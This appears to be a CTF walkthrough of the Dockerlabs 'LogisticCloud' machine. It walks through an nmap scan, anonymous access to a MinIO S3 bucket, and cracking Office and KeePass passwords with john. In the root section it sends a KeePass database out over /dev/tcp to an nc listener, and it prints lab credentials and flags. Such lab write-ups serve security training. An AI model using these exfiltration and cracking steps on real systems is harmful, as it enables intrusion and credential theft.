
Dockerlabs-LogisticCloud

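Author: HYH
A technology enthusiast focused on network security, penetration testing and CTF challenges, keen on documenting hands-on experience and sharing tools and techniques, and committed to continuous learning and growth.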

Nmap

[root@kali] /home/kali/LogisticCloud  
❯ nmap 172.17.0.2 -sV -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 22:07 EDT
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e9:59:86:db:ea:af:ff:09:ee:8f:ab:c6:0d:b8:b5:82 (ECDSA)
|_  256 ff:8d:9f:f8:e7:a5:f4:ce:6a:2d:e4:30:ac:77:18:fc (ED25519)
80/tcp   open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Login - HLG Logistics
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
9000/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (application/xml).
|_http-server-header: MinIO
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF4BCD11059
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:08:05 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>18442BF4BCD11059</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF13C1B8666
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>18442BF13C1B8666</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    Content-Length: 0
9001/tcp open  http    Golang net/http server
|_http-server-header: MinIO Console
|_http-title: MinIO Console
| fingerprint-strings: 
|   GenericLines, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 1309
|     Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; script-src 'self' https://unpkg.com; connect-src 'self' https://unpkg.com;
|     Content-Type: text/html
|     Last-Modified: Fri, 30 May 2025 02:07:50 GMT
|     Referrer-Policy: strict-origin-when-cross-origin
|     Server: MinIO Console
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    <!doctype html><html lang="en"><head><meta charset="utf-8"/><base href="/"/><meta content="width=device-width,initial-scale=1" name="viewport"/><meta content="#081C42" media="(prefers-color-scheme: light)" name="theme-color"/><meta content="#081C42" media="(prefers-color-scheme: dark)" name="theme-color"/><meta content="MinIO Console" name="description"/><meta name="minio-license" content="agpl"/><link href="./s

AWS

Port 80 serves a login form. Brute-forcing the login failed, so I looked at the page source and found an unusual value, huguelogistics-data, on an input whose name is bucket.

<div class="container">
    <h2>HLG Logistics - Ingreso</h2>
        <form method="post" action="index.php">
        <label>Usuario:</label>
	<input hidden="huguelogistics-data" name="bucket">
        <input type="text" name="username" required>
        <label>Contraseña:</label>
        <input type="password" name="password" required>
        <input type="submit" value="Entrar al sistema">
    </form>
</div>

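Amazon S3 (Simple Storage Service) is the object storage service provided by AWS, commonly used for storing static files, backups, website hosting and so on. The storage unit in S3 is called a bucket.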

python -m pip install awscli  # if you don't have aws

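Try accessing this bucket anonymously with aws-cli. The scan showed the service on port 9000 identifying itself as MinIO, which speaks the S3 API, so the endpoint is pointed there: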

[root@kali] /home/kali/LogisticCloud  
❯ aws s3 ls --no-sign-request --endpoint-url http://172.17.0.2:9000 s3://huguelogistics-data

2025-05-08 09:54:45      15360 backup.xlsx

Download it:

[root@kali] /home/kali/LogisticCloud  
❯ aws s3 cp s3://huguelogistics-data/backup.xlsx ./ --no-sign-request --endpoint-url http://172.17.0.2:9000

download: s3://huguelogistics-data/backup.xlsx to ./backup.xlsx 

Opening the file prompts for a password.


Use office2john to extract the hash, then crack it with john:

[root@kali] /home/kali/LogisticCloud  
❯ office2john backup.xlsx > hash.txt

[root@kali] /home/kali/LogisticCloud  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password88       (backup.xlsx)     
1g 0:00:00:05 DONE (2025-05-29 22:30) 0.1996g/s 3404p/s 3404c/s 3404C/s princez..mia305
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

After some trial and error, one account turned out to be able to log in:

username: prudencia.de.ferrera
password: )4UJM)JGab

Inside the admin backend, the SSH login user can be found:


[root@kali] /home/kali/LogisticCloud  
❯ ssh prudencia-de-ferrera@172.17.0.2                   
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:aUh1nVmGRC1uE7L4pGwk3WeWFmXrz0RwJpcawSJO8rA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
prudencia-de-ferrera@172.17.0.2's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.12.13-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

prudencia-de-ferrera@7fb26a28ed69:~$ ls
user.txt
prudencia-de-ferrera@7fb26a28ed69:~$ cat user.txt 
a303ce44f50628e5511aca3538d11f3e

Root

Enumeration turns up a KeePass password database file, which is then copied to the attacking machine:


[root@kali] /home/kali/Desktop  
❯ nc -lnvp 6666 > credentialsDatabase.kdb
listening on [any] 6666 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 39802

prudencia-de-ferrera@7fb26a28ed69:~$ cat /etc/keepass/credentialsDatabase.kdb > /dev/tcp/172.17.0.1/6666

Use keepass2john to extract the hash, then crack it with john:

[root@kali] /home/kali/LogisticCloud  
❯ john keepass.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:14 0.00% (ETA: 2025-06-03 02:04) 0g/s 47.29p/s 47.29c/s 47.29C/s batista..nichole
0g 0:00:00:15 0.00% (ETA: 2025-06-03 00:28) 0g/s 47.73p/s 47.73c/s 47.73C/s lonely..james1
0g 0:00:00:20 0.01% (ETA: 2025-06-03 00:10) 0g/s 49.35p/s 49.35c/s 49.35C/s andre..bethany
0g 0:00:02:20 0.04% (ETA: 2025-06-02 21:34) 0g/s 50.79p/s 50.79c/s 50.79C/s clever..emoemo
EMINEM           (credentialsDatabase.kdb)     
1g 0:00:02:37 DONE (2025-05-29 22:45) 0.006363g/s 50.49p/s 50.49c/s 50.49C/s jeannette..melania
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


The database contains pablo's password, which happens to also work for logging in as root.

prudencia-de-ferrera@7fb26a28ed69:~$ su root
Password: 
root@7fb26a28ed69:/home/prudencia-de-ferrera# id
uid=0(root) gid=0(root) groups=0(root)
root@7fb26a28ed69:/home/prudencia-de-ferrera# cat /root/root.txt 
16ceffb6b5f596855037e8ab1718b75f
root@7fb26a28ed69:/home/prudencia-de-ferrera# 